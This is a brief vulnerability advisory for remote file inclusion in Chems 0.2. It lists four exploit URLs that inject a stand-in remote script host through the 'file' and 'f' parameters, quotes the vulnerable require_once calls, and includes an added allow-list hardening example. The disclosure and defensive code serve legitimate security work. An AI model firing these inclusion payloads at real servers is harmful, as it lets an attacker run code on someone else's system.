Chems version 0.2 suffers from remote file inclusion vulnerabilities.
65fe2ae9522fcac22c5cd110531dfa678cc08c9c4f39e0c27ed1b3a4800f1a90
Chems-0.2 Remote File Inclusion
---------|
Download:|
---------|
http://downloads.sourceforge.net/chems/chems-0.2.tar.bz2?modtime=1193610635&big_mirror=0
----------------|
Timeline:9.11.07|
----------------|
-------|
Exploit|
-------|
/cdb.php?file=http://host/evilscript?
/posts_links.php?f=http://host/evilscript?
/functions.php?f=http://host/evilscript?
/pages_links.php?f=http://host/evilscript?
bug
---
require_once($file);
return ($records - 1);
#Return the given record taken from the given file.
require_once($f);
#Include the module.
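A hardened form of the two `require_once` calls quoted above, as an added example that is not part of the original advisory or of the Chems code base: the request parameter is used only as a key into a fixed allow-list and never as a path. The function name `resolve_module`, the `modules` directory and the module names are hypothetical.

```php
<?php
// Added example, not Chems code. The function name, directory layout
// and module list below are hypothetical.

// Fixed map from the value accepted in ?f= / ?file= to a file on disk.
const ALLOWED_MODULES = [
    'links'   => 'links.php',
    'records' => 'records.php',
];

/**
 * Return the absolute path for an allow-listed module key, or null.
 * The caller's input never becomes part of the path.
 */
function resolve_module($key, string $baseDir): ?string
{
    // Arrays (?f[]=x) and other non-strings are rejected outright.
    if (!is_string($key) || !array_key_exists($key, ALLOWED_MODULES)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . ALLOWED_MODULES[$key]);
    $prefix = $base . DIRECTORY_SEPARATOR;
    // Defence in depth: the resolved file must exist inside $baseDir
    // (guards against a symlink or a bad allow-list entry).
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly from the request, not from a global variable.
$module = resolve_module($_GET['f'] ?? null, __DIR__ . '/modules');
if ($module === null) {
    http_response_code(400);
    exit('Unknown module');
}
require_once $module;
```

Setting `allow_url_include = Off` in php.ini (the default since PHP 5.2.0) stops `require_once` from fetching a URL, but it does not stop inclusion of local files, so the allow-list is still needed.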
------|
Author|
------|
fl0 fl0w
e-mail:flo[underscore]flow[underscore]supremacy[at]yahoo[dot]com
site:http://fl0-fl0w.docspages.com
A renslt.org team member "...we're not the only ones but we're the best"